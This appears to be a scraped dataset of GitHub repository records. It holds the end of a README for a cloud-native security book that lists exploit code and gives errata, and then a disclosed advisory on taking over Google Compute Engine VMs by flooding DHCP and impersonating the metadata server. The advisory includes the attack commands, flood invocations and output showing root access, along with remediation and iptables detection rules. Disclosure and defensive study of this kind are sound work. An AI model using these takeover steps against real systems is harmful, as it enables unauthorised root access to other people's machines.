Attack/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0404-K8s Denial of Service Attack/)|CVE-2019- Exploit code for 11253 and CVE-2019-9512|Section 4.4|\n|[0405-Cloud native network attack/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0405-Cloud native network attack/)|Cloud native man-in-the-middle attack Network environment simulation and attack code example | Section 4.5 |\n\n## Share and exchange\n\nWelcome to pay attention to the official account of \"NSFOCUS Technology Research Newsletter\". We will continue to output high-quality research results in the frontier field of information security:\n\n![WeChat search for \"NSFOCUS Technology Research Newsletter\"](images/yjtx.png)\n\n## Precautions\n\nSome of the source codes come from other places on the Internet, and are archived together for the convenience of readers. These source codes and \"excerpt sources\" are:\n\n1. [0302-development side attack/02-CVE-2018-15664/symlink_race](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-development side Attack/02-CVE-2018-15664/symlink_race): https://seclists.org/oss-sec/2019/q2/131\n2. [0302-Development side attack/03-CVE-2019-14271/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-Development side attack ): https://unit42.paloaltonetworks.com/docker-patched-the-most-severe-copy-vulnerability-to-date-with-cve-2019-14271/\n3. [0304-runtime attack/01-container escape/CVE-2016-5195/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304- Runtime Attacks/01-Container Escape/CVE-2016-5195): https://github.com/scumjr/dirtycow-vdso\n4. [0304-Runtime Attack/01-Container Escape/CVE-2019-5736/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304- Runtime Attack/01-Container Escape/CVE-2019-5736): https://github.com/Frichetten/CVE-2019-5736-PoC\n\nThe license (License) of the referenced project and code is subject to the original project.\n\nPart of the source code modified by the author is no longer listed here, and the sources of relevant references are given in the book, and interested readers can refer to them.\n\n## Errata and supplementary instructions\n\n### 1st Edition 3rd Printing\n\n#### P44 - 3.3.1 Mirroring Vulnerability Exploitation\n\nSee [issue 8](https://github.com/Metarget/cloud-native-security-book/issues/8) for details.\n\nThe command used to build the image below page 44 is incomplete and lacks the specification of the build directory. The correct command is as follows (note that a `.` is added at the end):\n\n```bash\ndocker build --network=host -t alpine:cve-2019-5021 .\n```\n\nThank you readers [@WAY29](https://github.com/WAY29) points out. We will make corrections in subsequent printings.\n\n#### P42 - 3.2.3 CVE-2019-14271: Loading untrusted dynamic link libraries\n\nSee [issue 7](https://github.com/Metarget/cloud-native-security-book/issues/7) for details.\n\nThanks to reader [@WAY29](https://github.com/WAY29) for pointing this out. In order to successfully compile Glibc, the configure operation needs to be performed before make can be performed. We will make corrections in subsequent printings.\n\n#### P42 - 3.2.3 CVE-2019-14271: Loading untrusted dynamic link libraries\n\nSee [issue 6](https://github.com/Metarget/cloud-native-security-book/issues/6) for details.\n\nThanks to reader [@XDTG](https://github.com/XDTG) for pointing this out. There is no problem with the effect of the steps in the book, but the scheme proposed by [@XDTG](https://github.com/XDTG) is more natural and elegant. After verification, we will consider updating the scheme in subsequent printings.\n\n### Edition 1 1st Printing\n\n#### P37 - 3.2.2 CVE-2018-15664: Symbolic link replacement vulnerability (here is a supplementary explanation, the original text is correct)\n\nThe description of the paragraph beginning on the eighth line of the main text is difficult to understand:\n\n> The task of symlink_swap.c is to create a symbolic link pointing to the root directory \"/\" in the container, and constantly exchange the symbolic link (passed in by command line parameters, such as \"/totally_safe_path\") with a normal directory (such as \"/totally_safe_path\") -stashed\") name. In this way, when executing docker cp on the host machine, if it is first checked that \"/totally_safe_path\" is a normal directory, but \"/totally_safe_path\" becomes a symbolic link when the copy operation is performed later, then Docker will be on the host The symbolic link is resolved on the host.\n\nIn fact, inside the container, once the name swapping via renameat2 starts, `/totally_safe_path` and `/totally_safe_path-stashed` are actually just two strings for us, no longer tied to symlinks or normal directories, Only the moment you stop swapping does it re-determine which string points to which (symlink or directory).\n\nTherefore, in the book \"In this way, when executing docker cp on the host, if first...\" here, at this time, the name exchange has already started in the container. What the user (or attacker) wants to go to docker cp is the file or directory named `/totally_safe_path` in the container (meaning \"very safe path\"), which is expected (or the setting of this scenario); During the execution of docker cp, during the inspection phase, the `/totally_safe_path` path string still points to a normal directory, but when it comes to the copy operation, `/totally_safe_path` has been exchanged to point to a symbolic link.\n\nThanks to reader @\u7cd6\u7403\u7403\u739b\u9a6c\u541b for pointing it out.\n\n#### P85 - 4.2.1 Kubernetes API Server unauthorized access (version 1 3rd printing fixed)\n\nThere is an ambiguity in the fourth-to-last line of the text:\n\n> Then the attacker can control the cluster through this port as long as the network is reachable.\n\nIn fact, if you only set `--insecure-port=8080`, then the service is only listening on `localhost`, which is usually inaccessible to remote attackers, even if it is \"network reachable\" from an IP perspective. . If you want remote control, you also need to configure `--insecure-bind-address=0.0.0.0`.\n\nThe \"network reachable\" here actually wants to explain two situations:\n\n1. When adding `--insecure-bind-address`, it is directly accessed by the outside, that is, the above;\n2. Able to access localhost in some way, this scenario also includes:\n 1. Local users use the service on port 8080 to elevate their privileges;\n 2. Realize remote access to the localhost port based on methods similar to SSRF and DNS rebinding.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "irsl/gcp-dhcp-takeover-code-exec", "link": "https://github.com/irsl/gcp-dhcp-takeover-code-exec", "tags": [], "stars": 519, "description": "Google Compute Engine (GCE) VM takeover via DHCP flood - gain root access by getting SSH keys added by google_guest_agent", "lang": "Go", "repo_lang": "", "readme": "# Abstract\r\n\r\nThis was an advisory about an unpatched vulnerability (at time of publishing this repo, 2021-06-25) affecting \r\nvirtual machines in Google's Compute Engine platform. The flaw is fixed by Google since (as of 2021-07-30).\r\nThe technical details below is almost exactly the same as my report sent to the VRP team.\r\n\r\nAttackers could take over virtual machines of the Google Cloud Platform over the network due to weak \r\nrandom numbers used by the ISC DHCP software and an unfortunate combination of additional factors.\r\nThis is done by impersonating the Metadata server from the targeted virtual machine's point of view.\r\nBy mounting this exploit, the attacker can grant access to themselves over SSH (public key authentication) \r\nso then they can login as the root user.\r\n\r\n\r\n# The vulnerability\r\n\r\nISC's implementation of the DHCP client (isc-dhcp-client package on the Debian flavors) relies on\r\nrandom(3) to generate pseudo-random numbers (a nonlinear additive feedback random). \r\nIt is [seeded](https://github.com/isc-projects/dhcp/blob/master/client/dhclient.c) with the srandom function as follows:\r\n\r\n```\r\n\t/* Make up a seed for the random number generator from current\r\n\t time plus the sum of the last four bytes of each\r\n\t interface's hardware address interpreted as an integer.\r\n\t Not much entropy, but we're booting, so we're not likely to\r\n\t find anything better. */\r\n\tseed = 0;\r\n\tfor (ip = interfaces; ip; ip = ip->next) {\r\n\t\tint junk;\r\n\t\tmemcpy(&junk,\r\n\t\t &ip->hw_address.hbuf[ip->hw_address.hlen -\r\n\t\t\t\t\t sizeof seed], sizeof seed);\r\n\t\tseed += junk;\r\n\t}\r\n\tsrandom(seed + cur_time + (unsigned)getpid());\r\n```\r\n\r\nThis effectively consists of 3 components:\r\n\r\n- the current unixtime when the process is started\r\n\r\n- the pid of the dhclient process\r\n\r\n- the sum of the last 4 bytes of the ethernet addresses (MAC) of the network interface cards\r\n\r\nOn the Google Cloud Platform, the virtual machines usually have only 1 NIC, something like this:\r\n\r\n```\r\nroot@test-instance-1:~/isc-dhcp-client/real3# ifconfig\r\nens4: flags=4163 mtu 1460\r\n inet 10.128.0.2 netmask 255.255.255.255 broadcast 10.128.0.2\r\n inet6 fe80::4001:aff:fe80:2 prefixlen 64 scopeid 0x20\r\n ether 42:01:0a:80:00:02 txqueuelen 1000 (Ethernet)\r\n RX packets 1336873 bytes 128485980 (122.5 MiB)\r\n RX errors 0 dropped 0 overruns 0 frame 0\r\n TX packets 5708403 bytes 2012678044 (1.8 GiB)\r\n TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0\r\n```\r\n\r\nNote that the last 4 bytes (`0a:80:00:02`) of the MAC address (`42:01:0a:80:00:02`) are actually the same as \r\nthe internal IP address of the box (`10.128.0.2`). This means, 1 of the 3 components is effectively public.\r\n\r\nThe pid of the dhclient process is predictable. The linux kernel assigns process IDs in a linear way.\r\nI found that the pid varies between 290 and 315 (by rebooting a Debian 10 based VM many times and \r\nchecking the pid), making this component of the seed easily predictable.\r\n\r\nThe unix time component has a more broad domain, but this turns out to be not a practical problem (see later).\r\n\r\nThe firewall/router of GCP blocks broadcast packets sent by VMs, so only the metadata server (169.254.169.254)\r\nreceives them. However, some phases of the DHCP protocol don't rely on broadcasts, and the packets to be sent\r\ncan be easily calculated and sent in advance.\r\n\r\nTo mount this attack, the attacker needs to craft multiple DHCP packets using a set of precalculated/suspected \r\nXIDs and flood the victim's dhclient directly (no broadcasts here). If the XID is correct, the victim machine applies \r\nthe network configuration. This is a race condition, but since the flood is fast and exhaustive, the metadata server \r\nhas no real chance to win.\r\n\r\nAt this point the attacker is in the position of reconfiguring the network stack of the victim.\r\n\r\nGoogle heavily relies on the Metadata server, including the distribution of ssh public keys. \r\nThe connection is secured at the network/routing layer and the server is not authenticated (no TLS, clear \r\nhttp only). The `google_guest_agent` process, that is responsible for processing the responses of the\r\nMetadata server, establishes the connection via the virtual hostname `metadata.google.internal` which\r\nis an alias in the `/etc/hosts` file. This file is managed by `/etc/dhcp/dhclient-exit-hooks.d/google_set_hostname`\r\nas a hook part of the DHCP response processing and the alias is normally added by this script at each \r\nDHCPACK.\r\nBy having full control over DHCP, the Metadata server can be impersonated. This attack has been found and \r\ndocumented by `Chris Moberly`, who inspired my research with his oslogin privesc write up here:\r\n\r\nhttps://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-tech-notes/-/tree/master/oslogin-privesc-june-2020\r\n\r\nThe difference is, flooding of the dhclient process is done remotely in my attack and the XIDs are guessed.\r\n\r\nThe attack consists of 2 phases:\r\n\r\n#1 Instructing the client to set the IP address of the rogue metadata server on the NIC.\r\nNo router is configured. This effectively cuts the internet connection of the box. \r\n`google_guest_agent` can't fall back to connecting the real metadata server.\r\nThis DHCP lease is short lived (15 seconds), so dhclient sends a DHCPREQUEST soon again and starts looking \r\nfor a new DHCPACK. \r\n\r\nSince a new ip address (the rouge metadata server) and new hostname (`metadata.google.com`) is part of this\r\nDHCPACK packet, the `google_set_hostname` function adds two lines like like below (35.209.180.239 is the rouge \r\nmetadata server I used):\r\n\r\n35.209.180.239 metadata.google.internal metadata # Added by Google\r\n169.254.169.254 metadata.google.internal # Added by Google\r\n\r\n\r\nThe attacker is still flooding at this point, and since ARP is not flushed quickly, these packets are \r\nstill delivered.\r\n\r\n#2. Restoring a working network stack, along with the valid router address. This DHCPACK does not contain a hostname,\r\nso `google_set_hostname` won't touch `/etc/hosts`. The poisoned `metadata.google.internal` entry remains in there.\r\n\r\nIn case multiple entries are present in the hosts file, the Linux kernel prioritizes the link-local address \r\n(169.254.169.254) lower than the routable ones.\r\n\r\nAt this point `google_guest_agent` can establish a TCP connection to the (rouge) metadata server, where it gets\r\na config that contains the attacker's ssh public key. The entry is populated into `/root/.ssh/authorized_keys`\r\nand the attacker can open a root shell remotely.\r\n\r\n\r\n# Attack scenarios\r\n\r\nAttackers would gain full access to the targeted virtual machines in all attack scenarios below.\r\n\r\n- Attack #1: Targeting a VM on the same subnet (~same project), while it is rebooting.\r\n The attacker needs presence on another host.\r\n\r\n- Attack #2: Targeting a VM on the same subnet (~same project), while it is refreshing the lease (so no reboot is needed).\r\n This takes place every half an hour (1800s), making 48 windows/attempts possible a day. \r\n Since an F class VM has ~170.000 pps (packet per second), and a day of unixtime + potential pids makes ~86420 potential \r\n XIDs, this is a feasible attack vector.\r\n \r\n- Attack #3: Targeting a VM over the internet. This requires the firewall in front of the victim VM to be fully open. \r\n Probably not a common scenario, but since even the webui of GCP Cloud Console has an option for that, there must be \r\n quite some VMs with this configuration. \r\n In this case the attacker also needs to guess the internal IP address of the VM, but since the first VM seems \r\n to get `10.128.0.2` always, the attack could work, still.\r\n\r\n\r\n\r\n# Proof of concepts\r\n\r\n## Attack #1\r\n\r\nAs described above, you need to run a rogue metadata server running a host with port 80 open from the internet. \r\nI used 35.209.180.239 for this purpose (this is the public IP address of 10.128.0.2, a compute engine box actually), \r\nmeta.py is running here:\r\n\r\n```\r\n\troot@test-instance-1:~/isc-dhcp-client/real3# ./meta.py\r\n\tUsage: ./meta.py id_rsa.pub\r\n\r\n\troot@test-instance-1:~/isc-dhcp-client/real3# ./meta.py id_rsa.pub\r\n```\r\n\r\nMy proof of concept exploits a simplified setup, when the victim box is being rebooted. In this case unixtime\r\nof the dhclient process can be guessed easily.\r\n\r\n```\r\n\troot@test-instance-1:~/isc-dhcp-client/real3# ./takeover-at-reboot.pl\r\n\tUsage: ./takeover-at-reboot.pl victim-ip-address meta-ip-address\r\n```\r\n\r\nThe victim box is `10.128.0.4` here. The public IP address of this host is `34.67.219.89`.\r\nVerifying first we don't have access using the RSA private key that belongs to id_rsa.pub referenced above \r\nfor meta.py:\r\n\r\n```\r\n\troot@builder:/opt/_tmp/dhcp/exploit# ssh -i id_rsa root@34.67.219.89\r\n\tPermission denied (publickey).\r\n```\r\n\r\nThen the attack is started:\r\n\r\n```\r\n\troot@test-instance-1:~/isc-dhcp-client/real3# ./takeover-at-reboot.pl 10.128.0.4 35.209.180.239\r\n\r\n\t10.128.0.4: alive: 1601231808...\r\n```\r\n\r\nThen I type reboot on the victim host (`10.128.0.4`). The rest of the output of `takeover-at-reboot.pl`:\r\n\t\r\n```\r\n\t10.128.0.4 seems to be not alive anymore\r\n\tRUN: ip addr show dev ens4 | awk '/inet / {print $2}' | cut -d/ -f1\r\n\tRUN: ip route show default | awk '/via/ {print $3}'\r\n\tNIC: ens4\r\n\tMin pid: 290\r\n\tMax pid: 315\r\n\tMin ts: 1601231808\r\n\tMax ts: 1601231823\r\n\tMy IP: 10.128.0.2\r\n\tRouter: 10.128.0.1\r\n\tTarget IP: 10.128.0.4\r\n\tTarget MAC: 42:01:0a:80:00:04\r\n\tNumber of potential xids: 41\r\n\tInitial OFFER+ACK flood\r\n\tMAC: 42:01:0a:80:00:04\r\n\tSrc IP: 10.128.0.2\r\n\tDst IP: 10.128.0.4\r\n\tNew IP: 35.209.180.239\r\n\tNew hostname: metadata.google.internal\r\n\tNew route:\r\n\tACK: true\r\n\tOffer: true\r\n\tOneshot: false\r\n\tFlooding again to revert the original network config\r\n\tMAC: 42:01:0a:80:00:04\r\n\tSrc IP: 10.128.0.2\r\n\tDst IP: 10.128.0.4\r\n\tNew IP: 10.128.0.4\r\n\tNew hostname:\r\n\tNew route: 10.128.0.1\r\n\tACK: true\r\n\tOffer: false\r\n\tOneshot: false\r\n```\r\n\r\nAfter this point, the output of the screen where meta.py is running is flooded with lines like this:\r\n\r\n```\r\n\t34.67.219.89 - - [27/Sep/2020 18:40:06] \"GET /computeMetadata/v1//?recursive=true&alt=json&wait_for_change=true&timeout_sec=60&last_etag=NONE HTTP/1.1\" 200 -\r\n```\r\n\r\nAt this point, I can login to victim box using the new (attacker controlled) SSH key.\r\n\r\n```\r\n\troot@builder:/opt/_tmp/dhcp/exploit# ssh -i id_rsa root@34.67.219.89\r\n\tLinux metadata 4.19.0-11-cloud-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64\r\n\r\n\tThe programs included with the Debian GNU/Linux system are free software;\r\n\tthe exact distribution terms for each program are described in the\r\n\tindividual files in /usr/share/doc/*/copyright.\r\n\r\n\tDebian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\r\n\tpermitted by applicable law.\r\n\troot@metadata:~# id\r\n\tuid=0(root) gid=0(root) groups=0(root),1000(google-sudoers)\r\n```\r\n\r\nThis was tested using the official Debian 10 images.\r\n\r\n\r\n\r\n\r\n## Attack #2\r\n\r\nTo verify this setup, I built a slightly modified version of dhclient; besides some additional log lines the only important change is the \r\nincreased frequency of lease renewals:\r\n\r\n```\r\n*** dhclient.c.orig 2020-09-29 23:38:16.322296529 +0200\r\n--- dhclient.c 2020-09-29 22:51:11.000000000 +0200\r\n*************** void bind_lease (client)\r\n*** 1573,1578 ****\r\n--- 1573,1580 ----\r\n client->new = NULL;\r\n\r\n /* Set up a timeout to start the renewal process. */\r\n+ client->active->renewal = cur_time + 5; // hack!\r\n+\r\n tv.tv_sec = client->active->renewal;\r\n tv.tv_usec = ((client->active->renewal - cur_tv.tv_sec) > 1) ?\r\n myrandom(\"active renewal\") % 1000000 : cur_tv.tv_usec;\r\n```\r\n\r\n\r\nA 10 minute window consists of ~600 potetial XIDs. I rebooted the victim host (`10.128.0.4`), logged in, ran\r\n`journalctl -f|grep dhclient` to see what is going on. Then I executed the `takeover-at-renew.pl` script \r\non the attacker machine (internal ip: `10.128.0.2`, external ip: `35.209.180.239`, a VM on the same subnet):\r\n\r\n```\r\n# ONESHOT_WINDOW_MIN=10 ./takeover-at-renew.pl 10.128.0.4 35.209.180.239\r\n```\r\n\r\nThis resulted the following log lines on the victim machine:\r\n\r\n```\r\nOct 02 07:06:05 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:05 test-instance-2 dhclient[301]: DHCPACK of 10.128.0.4 from 169.254.169.254\r\nOct 02 07:06:05 test-instance-2 dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\nOct 02 07:06:10 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:10 test-instance-2 dhclient[301]: DHCPACK of 10.128.0.4 from 169.254.169.254\r\nOct 02 07:06:11 test-instance-2 dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\nOct 02 07:06:16 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:16 test-instance-2 dhclient[301]: DHCPACK of 10.128.0.4 from 169.254.169.254\r\nOct 02 07:06:16 test-instance-2 dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\nOct 02 07:06:21 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:21 test-instance-2 dhclient[301]: DHCPACK of 10.128.0.4 from 169.254.169.254\r\nOct 02 07:06:21 test-instance-2 dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\nOct 02 07:06:26 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:26 test-instance-2 dhclient[301]: DHCPACK of 10.128.0.4 from 169.254.169.254\r\nOct 02 07:06:26 test-instance-2 dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\nOct 02 07:06:31 test-instance-2 dhclient[301]: DHCPREQUEST for 10.128.0.4 on ens4 to 169.254.169.254 port 67\r\nOct 02 07:06:31 test-instance-2 dhclient[301]: DHCPACK of 35.209.180.239 from 10.128.0.2\r\nOct 02 07:06:32 metadata dhclient[301]: bound to 35.209.180.239 -- renewal in 5 seconds.\r\nOct 02 07:06:37 metadata dhclient[301]: DHCPREQUEST for 35.209.180.239 on ens4 to 35.209.180.239 port 67\r\nOct 02 07:06:44 metadata dhclient[301]: DHCPREQUEST for 35.209.180.239 on ens4 to 35.209.180.239 port 67\r\nOct 02 07:06:46 metadata dhclient[301]: DHCPACK of 10.128.0.4 from 10.128.0.2\r\nOct 02 07:06:47 metadata dhclient[301]: bound to 10.128.0.4 -- renewal in 5 seconds.\r\n```\r\n\r\nThis means the 6th round was successful. With \"normal\" lease renewal (unpatched `dhclient`), the same thing would have \r\ntaken ~3 hours.\r\n\r\nThe attack was indeed successful:\r\n\r\n```\r\nroot@test-instance-2:~# cat /etc/hosts\r\n127.0.0.1 localhost\r\n::1 localhost ip6-localhost ip6-loopback\r\nff02::1 ip6-allnodes\r\nff02::2 ip6-allrouters\r\n\r\n35.209.180.239 metadata.google.internal metadata # Added by Google\r\n169.254.169.254 metadata.google.internal # Added by Google\r\n```\r\n\r\nI repeated the attack and flooded the victim with 3 hours of XIDs (~10000). The 51th DHCPREQUEST was hijacked (would \r\nhave taken a little bit more than a complete day with \"normal\" lease times).\r\nI concluded that the execution time indeed correlates with the number of XIDs. \r\nThis of course would decrease the success rate in real life setups, but the attack is still feasible.\r\n\r\n\r\n## Attack #3\r\n\r\nA prerequisite of this attack is the GCP firewall to be effectively turned off.\r\n\r\nI found that my DHCP related packets were not forwarded to the VM while the VM is rebooting (probably not after the \r\nlease is returned at reboot), effectively ruling out `takeover-at-discover.pl`.\r\n\r\nI decided to carry out an attack against the lease renewal (effectively the same as #2). My expectation was that it should\r\nstill be feasible.\r\n\r\nI tested this scenario using an AWS VM as the attacker machine and a really short time window (2 minutes).\r\nThe `meta.py` script was still running on the GCP attacker machine (external ip: 35.209.180.239).\r\nI rebooted the victim machine (internal ip: `10.128.0.4`, external ip: `34.122.27.253`), logged in, ran `journalctl -f|grep dhclient`.\r\n\r\nThen on the AWS attacker machine (external ip: `3.136.97.244`), I executed this command:\r\n\r\n```\r\nroot@ip-172-31-25-197:~/real8# NIC=eth0 ONESHOT_WINDOW_MIN=2 FINAL_IP=10.128.0.4 MY_ROUTER=10.128.0.1 ./takeover-at-renew.pl 34.122.27.253 35.209.180.239\r\nFlooding destination between with XIDs between 1601651865 and 1601651984\r\nRUN: ip addr show dev eth0 | awk '/inet / {print $2}' | cut -d/ -f1\r\nRUN: /root/real8/randr 10.128.0.4 290 315 1601651865 1601651984 2>/dev/null | paste -sd ',' - >/tmp/xids.txt\r\nNIC: eth0\r\nMin pid: 290\r\nMax pid: 315\r\nMin ts: 1601651865\r\nMax ts: 1601651984\r\nAttacker IP: 172.31.25.197\r\nRouter: 10.128.0.1\r\nTarget IP (initial phase): 34.122.27.253\r\nTarget MAC: 42:01:0a:80:00:04\r\nTarget IP (final phase): 10.128.0.4\r\n34.122.27.253 is alive\r\nStart flooding the victim for 1801 sec\r\nAnd monitoring it in the background\r\nRunning for 1801 sec in the background: /root/real8/flood -ack -lease 15 -dev eth0 -dstip 34.122.27.253 -newhost metadata.google.internal -newip 35.209.180.239 -srcip 172.31.25.197 -mac 42:01:0a:80:00:04 -xidfile /tmp/xids.txt\r\nMAC: 42:01:0a:80:00:04\r\nSrc IP: 172.31.25.197\r\nDst IP: 34.122.27.253\r\nNew IP: 35.209.180.239\r\nNew hostname: metadata.google.internal\r\nNew route:\r\nACK: true\r\nOffer: false\r\nOneshot: false\r\nNumber of XIDs: 145\r\nThe host is down, it probably swallowed the poison ivy!\r\nAnd now some flood again to revert connectivity\r\nit seems the attack was successful\r\nroot@ip-172-31-25-197:~/real8# Running for 12 sec in the background: /root/real8/flood -ack -ack -lease 1800 -dev eth0 -dstip 34.122.27.253 -newip 10.128.0.4 -route 10.128.0.1 -srcip 172.31.25.197 -mac 42:01:0a:80:00:04 -xidfile /tmp/xids.txt\r\nMAC: 42:01:0a:80:00:04\r\nSrc IP: 172.31.25.197\r\nDst IP: 34.122.27.253\r\nNew IP: 10.128.0.4\r\nNew hostname:\r\nNew route: 10.128.0.1\r\nACK: true\r\nOffer: false\r\nOneshot: false\r\nNumber of XIDs: 145\r\n```\r\n\r\nThis was running for a while and finally succeeded at the 21th DHCPREQUEST. With normal lease times this would have taken ~11 hours.\r\nThe metadata server was taken over successfully:\r\n\r\n```\r\nOct 02 15:21:30 test-instance-2 dhclient[301]: DHCPACK of 35.209.180.239 from 3.136.97.244\r\nOct 02 15:21:30 metadata dhclient[301]: bound to 35.209.180.239 -- renewal in 5 seconds.\r\n```\r\n\r\nThe host file was modified according to the expectations:\r\n\r\n```\r\nroot@test-instance-2:~# cat /etc/hosts\r\n127.0.0.1 localhost\r\n::1 localhost ip6-localhost ip6-loopback\r\nff02::1 ip6-allnodes\r\nff02::2 ip6-allrouters\r\n\r\n35.209.180.239 metadata.google.internal metadata # Added by Google\r\n169.254.169.254 metadata.google.internal # Added by Google\r\n```\r\n\r\nAnd also got some connections from the osconfig agent (the kept-alive connection of the guest agent probably survived the network change)\r\n\r\n```\r\n34.122.27.253 - - [02/Oct/2020 15:29:09] \"PUT /computeMetadata/v1/instance/guest-attributes/guestInventory/Hostname HTTP/1.1\" 501 -\r\n```\r\n\r\nWhen I repeated this attack (2 minute XID window still), the 5th round was successful (2.5 hours with normal leases).\r\n\r\n\r\nConclusion about attack #2 and #3: not the most reliable thing on earth, but definetely possible. I think if I kept the victim host down\r\nlonger than the TCP read timeout of google_guest_agent, then the existing metadata server connection would be interrupted, then \r\nwhile reinitiating the connection after the network connectivity was restored, it would hit the fake metadata server.\r\n\r\n\r\n\r\n# Remediation\r\n\r\n- Get in touch with ISC. They really need to improve the srandom setup. Maybe get a new feature added that drops packets by \r\n non-legitimate DHCP servers (so you could rely on this as an additional security measure).\r\n- Even if ISC has improved their software, it won't be upgraded on most of your VMs. Analyze your firewall logs to learn \r\n if you have any clients that rely on these ports for any legitimate reasons.\r\n Block udp/68 between VMs, so that only the metadata server could could carry out DHCP.\r\n- Stop using the Metadata server via this virtual hostname (metadata.google.internal). At least in your official agents.\r\n- Stop managing the virtual hostname (metadata.google.internal) via DHCP. The IP address is documented to be stable anyway.\r\n- Secure the communication with the Metadata server by using TLS, at least in your official agents.\r\n\r\nNote, using a random generated MAC address wouldn't prevent mounting the attack on the same subnet.\r\n\r\n# FAQ\r\n\r\n** - The issue seems generic. Are other cloud providers affected as well? **\r\n\r\n- I checked only the major ones, they were not affected (at least at the time of checking) due to another factors \r\n (e.g. not using DHCP by default).\r\n\r\n** - If Google doesn't fix this, what can I do? **\r\n\r\n- Google usually closes bug reports with status \"Unfeasible\" when the efforts required to fix outweigh the risk. \r\n This is not the case here. I think there is some technical complexity in the background, which doesn't allow\r\n them deploying a network level protection measure easily.\r\n Until the fix arrives, consider one of the followings:\r\n - don't use DHCP\r\n - setup a host level firewall rule to ensure the DHCP communication comes from the metadata server (169.254.169.254)\r\n - setup a GCP/VPC/Firewall rule blocking udp/68 as is (all source, all destination) [more info](https://github.com/irsl/gcp-dhcp-takeover-code-exec/issues/4#issuecomment-872145234)\r\n\r\nGoogle's official guidance to block untrusted internal traffic to exploit this flaw:\r\n\r\n---\r\n> To block incoming traffic over UDP port 68, adjust the following gCloud command syntax for your environment:\r\n> \r\n> ```\r\n> gcloud --project= compute firewall-rules create block-dhcp --action=DENY --rules=udp:68 --network= --priority=100\r\n> ```\r\n> \r\n> * The above command will create a firewall rule named `\"block-dhcp\"` in the specified project and VPC that will block all inbound traffic over UDP port 68 \r\n> * Setting the priority to `100` gives the rule a high priority, but other values can be used. We recommend setting this value [as low as possible](https://cloud.google.com/vpc/docs/firewalls#priority_order_for_firewall_rules) to prevent other rules from superseding it \r\n> * The command will need to be executed for each VPC you wish to block DHCP on by replacing `` with the respective VPC\r\n> * Note that firewall rule names cannot be reused within the same project; multiple rules for different VPCs in a project will need to have different names (`block-dhcp2`, `block-dhcp-vpcname`, etc)\r\n> * Additional information on configuring firewall rules can be in Google Cloud documentation [here](https://cloud.google.com/vpc/docs/using-firewalls).\r\n---\r\n\r\n** - How to detect this attack? **\r\n\r\nDHCP renewal usually yields only a few packets every 30 minutes (per host). This attack requires sending a flood of\r\nDHCP packets (hundreds of thousands of packets per second). Setting a rate limiter could probably detect or prevent\r\nthe attack:\r\n\r\n```\r\niptables -A INPUT -p udp --dport 68 -m state --state NEW -m recent --set\r\niptables -A INPUT -p udp --dport 68 -m state --state NEW -m recent --update --seconds 1 --hitcount 10 -j LOG --log-prefix \"DHCP attack detected \"\r\n```\r\n\r\n** - What is the internal ID of this bug in Google's bug tracker? **\r\n\r\nhttps://issuetracker.google.com/issues/169519201\r\n\r\n** - Is this a vulnerability of ISC dhclient? **\r\n\r\nWhile a PRNG with more entropy sources could have prevented this flaw being exploitable in GCP, I still think this is not \r\na vulnerability of their implementation for the following two reasons:\r\n- DHCP XIDs are public (broadcasted on the same LAN) anyway\r\n- with regular IP/MAC setups (=where they are not predictable/static) and udp/68 exposed, not even the current \"weak\" PRNG \r\n would be practically exploitable\r\n\r\nNote: in the meanwhile, Google has identified an [additional attack vector](https://gitlab.isc.org/isc-projects/dhcp/-/issues/197)\r\ngaining an MitM position for a local threat actor.\r\n\r\n\r\n# Timeline\r\n\r\n* 2020-09-26: Issue identified, attack #1 validated\r\n* 2020-09-27: Reported to Google VRP\r\n* 2020-09-29: VRP triage is complete \"looking into it\"\r\n* 2020-10-02: Further details shared about attack #2 and #3\r\n* 2020-10-07: Accepted, \"Nice catch\"\r\n* 2020-12-02: Update requested about the estimated time of fix\r\n* 2020-12-03: ... \"holiday season coming up\"\r\n* 2021-06-07: Asked Google if a fix is coming in a reasonable time, as I'm planning to publish an advisory\r\n* 2021-06-08: Standard response \"we ask for a reasonable advance notice.\"\r\n* 2021-06-25: Public disclosure\r\n* 2021-07-30: \"Our systems show that all the bugs we created based on your report have been fixed by the product team.\"\r\n\r\n# Credits\r\n\r\n[Imre Rad](https://www.linkedin.com/in/imre-rad-2358749b/)\r\n", "readme_type": "markdown", "hn_comments": "This is well worth reading. It describes how, through a series of well meaning steps, you shoot yourself in the face.It all starts with:\"Note that the last 4 bytes (0a:80:00:02) of the MAC address (42:01:0a:80:00:02) are actually the same as the internal IP address of the box (10.128.0.2). This means, 1 of the 3 components is effectively public.\"It's so strange to me that they have a process for adding a root key that involves no authentication at all. These are VMs with their images running their pre-installed software, it's not like this would have been a hard problem.Communist data is public property.If I understand correctly, the attack can be mitigated with the appropriate level of firewall rules. Both ingress and egress traffic should be blocked by default and selectively allowed based on need. In this case, DHCP traffic would only be allowed to 169.254.169.254.You still have somebody in your network though, so there's that.Has it been verified that GCE is still vulnerable?There's clearly a communication gap between the researcher and Google. But perhaps the techies at Google saw it and fixed it and it just hasn't 